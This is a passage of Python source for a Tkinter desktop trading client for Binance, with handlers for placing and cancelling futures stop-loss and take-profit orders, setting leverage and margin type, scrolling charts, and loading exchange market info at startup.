if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Stop-Loss deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Take-Profit deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTP(self):
global PPP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Take-Profit deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position LONG Order Take-Profit posted [' + grSmb + '], Price: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Stop-Loss deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Position SHORT Order Stop-Loss posted [' + grSmb + '], Price: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTPR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG Order Take-Profit deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT Order Stop-Loss deleted [' + grSmb + '], Price: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#__Event: mouse wheel scrolled over the Scale_TP widget
def Scale_TP_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
if app.Scale_TP.get() == -100:
app.Scale_TP.configure (to=-450,from_=-100)
elif app.Scale_TP.get() == -450:
app.Scale_TP.configure (to=-800,from_=-450)
elif app.Scale_TP.get() == 700:
app.Scale_TP.configure (to=350,from_=700)
elif app.Scale_TP.get() == 350:
app.Scale_TP.configure (to=-100,from_=350)
app.Scale_TP.set(app.Scale_TP.get()-0.1)
if event.num == 4 or event.delta >= 120:
if app.Scale_TP.get() == 350:
app.Scale_TP.configure (to=350,from_=700)
elif app.Scale_TP.get() == 700:
app.Scale_TP.configure (to=700,from_=1050)
elif app.Scale_TP.get() == -100:
app.Scale_TP.configure (to=-100,from_=350)
elif app.Scale_TP.get() == -450:
app.Scale_TP.configure (to=-450,from_=-100)
app.Scale_TP.set(app.Scale_TP.get()+0.1)
#__Event: mouse wheel scrolled over the Scale_SL widget
def Scale_SL_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
if app.Scale_SL.get() == -100:
app.Scale_SL.configure (to=-450,from_=-100)
elif app.Scale_SL.get() == -450:
app.Scale_SL.configure (to=-800,from_=-450)
elif app.Scale_SL.get() == 700:
app.Scale_SL.configure (to=350,from_=700)
elif app.Scale_SL.get() == 350:
app.Scale_SL.configure (to=-100,from_=350)
app.Scale_SL.set(app.Scale_SL.get()-0.1)
if event.num == 4 or event.delta >= 120:
if app.Scale_SL.get() == 350:
app.Scale_SL.configure (to=350,from_=700)
elif app.Scale_SL.get() == 700:
app.Scale_SL.configure (to=700,from_=1050)
elif app.Scale_SL.get() == -100:
app.Scale_SL.configure (to=-100,from_=350)
elif app.Scale_SL.get() == -450:
app.Scale_SL.configure (to=-450,from_=-100)
app.Scale_SL.set(app.Scale_SL.get()+0.1)
#__Event: value of the Scale_TP widget changed
def Scale_TP_change(self,value):
global PPP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PPP_Tmp * PPA)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPPP_Tmp_txt,900,yyC)
app.graph_Cn.itemconfigure(GPPP_Tmp_txt,text='Price: ' + str(PPP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PPP_Tmp * PPA)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPSP_Tmp_txt,900,yyC)
app.graph_Cn.itemconfigure(GPSP_Tmp_txt,text='Price: ' + str(PPP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
#__Event: value of the Scale_SL widget changed
def Scale_SL_change(self,value):
global PSP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PSP_Tmp * PPA)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPSP_Tmp_txt, 900,yyC)
app.graph_Cn.itemconfigure(GPSP_Tmp_txt,text='Price: ' + str(PSP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
#print ('SL_change',value)
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PSP_Tmp * PPA)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPPP_Tmp_txt, 900,yyC)
app.graph_Cn.itemconfigure(GPPP_Tmp_txt,text='Price: ' + str(PSP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
def OptionCYP_selected(self,choice):
global grZm
global should_run_C
grZm_choice = choice
if grZm_choice == '-50%':
grZm = 50
elif grZm_choice == '-40%':
grZm = 100
elif grZm_choice == '-30%':
grZm = 200
elif grZm_choice == '-20%':
grZm = 300
elif grZm_choice == '-10%':
grZm = 400
elif grZm_choice == '0%':
grZm = 500
elif grZm_choice == '+10%':
grZm = 600
elif grZm_choice == '+20%':
grZm = 700
elif grZm_choice == '+30%':
grZm = 800
elif grZm_choice == '+40%':
grZm = 900
elif grZm_choice == '+50%':
grZm = 1000
if GS in ('CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d'):
if should_run_C == True:
#__Stop Timer
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
time.sleep(0.5)
#__Restart Timer
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Stop", fg='red')
should_run_C = True
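#__Drag-to-scroll handlers: remember where the mouse went down, then on
#__release scroll the affected canvases by the drag distance (1 unit / 20 px).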
def button1_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button1_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_1.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_1.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_VV.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_BTCD.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def button10_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button10_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Cn.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Cn.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonSm_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def buttonSm_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Sm.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Sm.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonZm_release(self,event):
global SxF, SyF
global yI0Zm
global grH
SxF, SyF = event.x, event.y
grMd=grH/2
yy = yI0Zm +(((grMd - SyF)/25)*prSt)
#print (yy)
if prSt >= 1:
yy1 = "%.0f" % (yy)
yy2=float(yy1)
if prSt == 0.1:
yy1 = "%.1f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.01:
yy1 = "%.2f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.001:
yy1 = "%.3f" % (yy)
yy2=float(yy1)
elif prSt == 0.0001:
yy1 = "%.4f" % (yy)
yy2=float(yy1)
elif prSt == 0.00001:
yy1 = "%.5f" % (yy)
yy2=float(yy1)
elif prSt == 0.000001:
yy1 = "%.6f" % (yy)
yy2=float(yy1)
elif prSt == 0.0000001:
yy1 = "%.7f" % (yy)
yy2=float(yy1)
elif prSt == 0.00000001:
yy1 = "%.8f" % (yy)
yy2=float(yy1)
app.text_POrd.delete(1.0,END)
app.text_POrd.insert(1.0, yy2)
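#__Pair selection changed: reload tick size, lot step and max quantity from
#__the cached exchangeInfo, and for FUTURES also pull the pair's current
#__leverage and margin type from the account.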
def CB_P_changed(self,event):
global SP
global grSmb
global prSt
global grSt
global grOW
global Lo
global Lvrg
global Lvrg_Tmp
global MrgT
global MrgT_Tmp
global Should_Chng
global orLSS
SP = self.CB_P.get()
self.label_P.config(text = SP)
tstr=''
orLSS=1
Should_Chng = False
app.Tree_Ord.delete(*app.Tree_Ord.get_children())
if MS == 'SPOT':
tstr = 'SPOT'
MrgT='NONE'
MrgT_Tmp='NONE'
if len(myTuplEI1)>0 and len(mylistSP)>0:
for mm in range (len(mylistSP)):
if mylistSP[mm]['symbol'] == SP:
app.Tree_PI.item(1, values=('symbol',mylistSP[mm]['symbol']))
app.Tree_PI.item(2, values=('status',mylistSP[mm]['status']))
app.Tree_PI.item(3, values=('baseAsset',mylistSP[mm]['baseAsset']))
app.Tree_PI.item(4, values=('quoteAsset',mylistSP[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('marginAsset','-'))
app.Tree_PI.item(6, values=('contractType','-'))
mylist10 = []
mylist10 = mylistSP[mm]['filters']
if len(mylist10)>0:
app.Tree_PI.item(7, values=('minPrice',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('maxPrice',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('tickSize',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('maxQty',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('stepSize',mylist10[2]['stepSize']))
prSt = float(mylist10[0]['tickSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[5]['maxQty'])
Lo=0
grSmb = SP
elif MS == 'FUTURES':
tstr = 'FUTURES'
if len(myTuplEI2)>0 and len(mylistFT)>0:
for mm in range (len(mylistFT)):
if mylistFT[mm]['symbol'] == SP:
#print(mylistFT[mm])
app.Tree_PI.item(1, values=('symbol',mylistFT[mm]['symbol']))
app.Tree_PI.item(2, values=('status',mylistFT[mm]['status']))
app.Tree_PI.item(3, values=('baseAsset',mylistFT[mm]['baseAsset']))
app.Tree_PI.item(4, values=('quoteAsset',mylistFT[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('marginAsset',mylistFT[mm]['marginAsset']))
app.Tree_PI.item(6, values=('contractType',mylistFT[mm]['contractType']))
mylist10 = []
mylist10 = mylistFT[mm]['filters']
if len(mylist10)>0:
prSt = float(mylist10[0]['tickSize'])
orLSS= float(mylist10[1]['stepSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[2]['maxQty'])
Lo=0
grSmb = SP
app.Tree_PI.item(7, values=('minPrice',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('maxPrice',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('tickSize',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('maxQty',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('stepSize',mylist10[1]['stepSize']))
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES positions:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
if BnFAcc10['symbol']==grSmb:
#print (grSmb)
Lvrg=BnFAcc10['leverage']
Lvrg_Tmp = Lvrg
#print(Lvrg)
app.CB_Lvrg.set(Lvrg)
app.label_OrdAss.config(text = 'USDT x ' + str(Lvrg))
Isl=BnFAcc10['isolated']
if Isl == True:
app.CB_MrgT.set('ISOLATED')
MrgT='ISOLATED'
MrgT_Tmp=MrgT
elif Isl==False:
app.CB_MrgT.set('CROSSED')
MrgT='CROSSED'
MrgT_Tmp=MrgT
#print(bot.symbolLeverage(symbol=grSmb))
#print(bot.symbolMarginType(symbol=grSmb))
self.label_PI.config(text = tstr)
def CB_MrgT_changed(self,event):
global MrgT_Tmp
if MS == 'FUTURES':
MrgT_Tmp = app.CB_MrgT.get()
def CB_Lvrg_changed(self,event):
global Lvrg_Tmp
Lvrg_Tmp = app.CB_Lvrg.get()
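#__Apply leverage / margin-type changes only when the pair has no open
#__position, no open orders, and something actually changed; otherwise a
#__message box explains why the change was declined.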
def click_button_MrLvSet(self):
#global Lvrg
#global MrgT
global Should_Chng
Should_Chng=False
MrgT_Tmp_B=False
Msg_Tmp=0
if MrgT_Tmp == 'ISOLATED':
MrgT_Tmp_B=True
else:
MrgT_Tmp_B=False
if MS == 'FUTURES':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb:
Should_Chng=False
Msg_Tmp=3
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['positions']
if len(BnFAcc1)>0:
for mm in range(len(BnFAcc1)):
BnFAcc10 = BnFAcc1[mm]
#if BnFAcc10['symbol']==grSmb:
# print(BnFAcc10['positionAmt'])
# print (float(BnFAcc10['leverage']),float(Lvrg_Tmp),BnFAcc10['isolated'],MrgT_Tmp_B,MrgT_Tmp)
if BnFAcc10['symbol']==grSmb and (float(BnFAcc10['positionAmt'])>0 or float(BnFAcc10['positionAmt'])<0):
Msg_Tmp=1
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and float(BnFAcc10['leverage']) == float(Lvrg_Tmp) and BnFAcc10['isolated'] == MrgT_Tmp_B and Msg_Tmp==0:
Msg_Tmp=2
Should_Chng=False
elif BnFAcc10['symbol']==grSmb and float(BnFAcc10['positionAmt'])==0 and (float(BnFAcc10['leverage']) != float(Lvrg_Tmp) or BnFAcc10['isolated'] != MrgT_Tmp_B) and Msg_Tmp==0:
Should_Chng=True
if BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) == float(Lvrg_Tmp):
Msg_Tmp=4
elif BnFAcc10['isolated'] == MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=5
elif BnFAcc10['isolated'] != MrgT_Tmp_B and float(BnFAcc10['leverage']) != float(Lvrg_Tmp):
Msg_Tmp=6
if Should_Chng==False and Msg_Tmp==1:
    messagebox.showinfo("Changes declined", "There is an open position on pair " + grSmb)
elif Should_Chng==False and Msg_Tmp==2:
    messagebox.showinfo("Changes declined", "There are no changes to apply for pair " + grSmb)
elif Should_Chng==False and Msg_Tmp==3:
    messagebox.showinfo("Changes declined", "There are open orders on pair " + grSmb)
#print (Should_Chng)
#print (Lvrg,Lvrg_Tmp,MrgT,MrgT_Tmp)
if Should_Chng==True:
if Msg_Tmp==5 or Msg_Tmp==6:
bot.futuresChLeverage(symbol=grSmb,leverage=int(Lvrg_Tmp))
messagebox.showinfo("Set changes leverage", "Leverage for this pair " + grSmb + " changed" + Lvrg_Tmp)
sys_msg = ' The pair\'s leverage ' + grSmb + ' posted x' + Lvrg_Tmp
app.Sys_Msg(text1=sys_msg)
if Msg_Tmp==4 or Msg_Tmp==6:
bot.futuresChMarginType(symbol=grSmb,marginType=MrgT_Tmp)
messagebox.showinfo("Set changes margin", "Margin for this pair " + grSmb + " changed" + MrgT_Tmp)
sys_msg = ' Pair Margin Mode ' + grSmb + ' posted:' + MrgT_Tmp
app.Sys_Msg(text1=sys_msg)
def market_selected(self,choice):
global MS
MS = choice
if MS == 'SPOT':
app.CB_MrgT['values'] = ('NONE',)
app.CB_MrgT.current(0)
MrgT='NONE'
app.CB_Lvrg['values'] = ('1',)
app.CB_Lvrg.current(0)
elif MS == 'FUTURES':
app.CB_MrgT['values'] = ('ISOLATED', 'CROSSED')
app.CB_MrgT.current(0)
MrgT='ISOLATED'
app.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
app.CB_Lvrg.current(0)
self.PL_make()
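#__Show the canvas matching the selected chart type; the other canvases are
#__hidden with place_forget() rather than destroyed.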
def graph_selected(self,choice):
global GS
GS = choice
wh = root.winfo_height()
ww = root.winfo_width()
if GS=='TICK':
app.graph_1.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_Sm.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
elif GS in ('CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d'):
app.graph_1.place_forget()
app.graph_Sm.place_forget()
app.graph_Cn.place(x=10,y=150,width=ww-490,height=wh-320)
app.graph_VV.place(x=10,y=wh-300,width=ww-490,height=100)
app.graph_BTCD.place(x=10,y=180,width=ww-490,height=100)
elif GS=='CANDLE SUMM':
app.graph_1.place_forget()
app.graph_Cn.place_forget()
app.graph_VV.place_forget()
app.graph_BTCD.place_forget()
app.graph_Sm.place(x=10,y=150,width=ww-490,height=wh-320)
def pair_selected(self,choice):
global MPS
MPS = choice
if choice == 'All':
MPS = ''
elif choice == 'USDT':
MPS = 'USDT'
self.PL_make()
def PL_make(self):
if MS == 'SPOT':
if MPS == '':
app.CB_P["values"] = mylist1
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistSP)):
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
app.CB_P["values"] = mylist10
elif MS == 'FUTURES':
if MPS == '':
app.CB_P["values"] = mylist2
elif MPS == 'USDT':
mylist10 = []
for mm in range(len(mylistFT)):
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistFT[mm]['symbol'])
app.CB_P["values"] = mylist10
#______________MAIN WINDOW GUI END
#______________MAIN WINDOW GUI LOADING BEGIN
#__Start CODE
root = Tk()
app = gui(root)
root.title('iTrader. Trading on Binance')
root.protocol("WM_DELETE_WINDOW", close_window)
root.geometry("1400x850+150+100")
#__Main Menu
menu = Menu(root)
new_item=Menu(menu, tearoff=0)
new_item.add_command(label='Keys',command=clicked_Bnacc)
new_item.add_separator()
new_item.add_command(label='Balances',command=clicked_blns)
new_item.add_command(label='Orders',command=clicked_Ordrs)
menu.add_cascade(label='Account', menu=new_item)
root.config(menu=menu)
#__Connecting Binance
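#__The four-line timestamp-prefix pattern below repeats for every startup
#__message; a tiny helper could fold it into one call (sketch only, not
#__wired in):
#    def ts():
#        return datetime.datetime.now().strftime("[%d.%m.%Y %H:%M:%S] ")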
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str = time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = str(time_local_str) + ' Launching the program. Connecting to Binance ...'
app.text_Sys.insert(1.0, sys_msg)
#print(bot.time())
myListST = bot.time()
sss23 = myListST['serverTime']/1000
sss24 = datetime.datetime.fromtimestamp(sss23)
sss25=sss24.strftime("[%d.%m.%Y %H:%M:%S] ")
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Binance time: ' + str(sss25)
app.text_Sys.insert(END, sys_msg)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Reading the Binance markets ...'
app.text_Sys.insert(END, sys_msg)
#__start reading Markets.SPOT
myTuplEI1 = bot.exchangeInfo()
app.CB_P["values"]=()
mylist1 = []
mylist10 = []
if len(myTuplEI1)>0:
mylistSP = myTuplEI1['symbols']
if len(mylistSP)>0:
for mm in range (len(mylistSP)):
mylist1.append(mylistSP[mm]['symbol'])
#print(mylist1[mm]['symbol'])
if MPS == 'USDT':
if mylistSP[mm]['quoteAsset'] == 'USDT':
mylist10.append(mylistSP[mm]['symbol'])
if mylistSP[mm]['symbol'] == grSmb and MS == 'SPOT':
myListSmbFlt = []
myListSmbFlt = mylistSP[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[5]['maxQty'])
#print (prSt, grOW)
#__start reading Markets.FUTURES
myTuplEI2 = bot.futuresExchangeInfo()
mylist2 = []
mylist20 = []
if len(myTuplEI2)>0:
mylistFT = myTuplEI2['symbols']
if len(mylistFT)>0:
for mm in range (len(mylistFT)):
mylist2.append(mylistFT[mm]['symbol'])
if MPS == 'USDT':
if mylistFT[mm]['quoteAsset'] == 'USDT':
mylist20.append(mylistFT[mm]['symbol'])
if mylistFT[mm]['symbol'] == grSmb and MS == 'FUTURES':
myListSmbFlt = []
myListSmbFlt = mylistFT[mm]['filters']
if len(myListSmbFlt)>0:
prSt = float(myListSmbFlt[0]['tickSize'])
grOW = float(myListSmbFlt[2]['maxQty'])
#print (prSt, grOW)
if MS =='SPOT':
if MPS == 'USDT':
app.CB_P["values"] = mylist10
else:
app.CB_P["values"] = mylist1
elif MS == 'FUTURES':
if MPS == 'USDT':
app.CB_P["values"] = mylist20
else:
app.CB_P["values"] = mylist2
app.CB_P.set(grSmb)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + ' Binance Markets are read.'
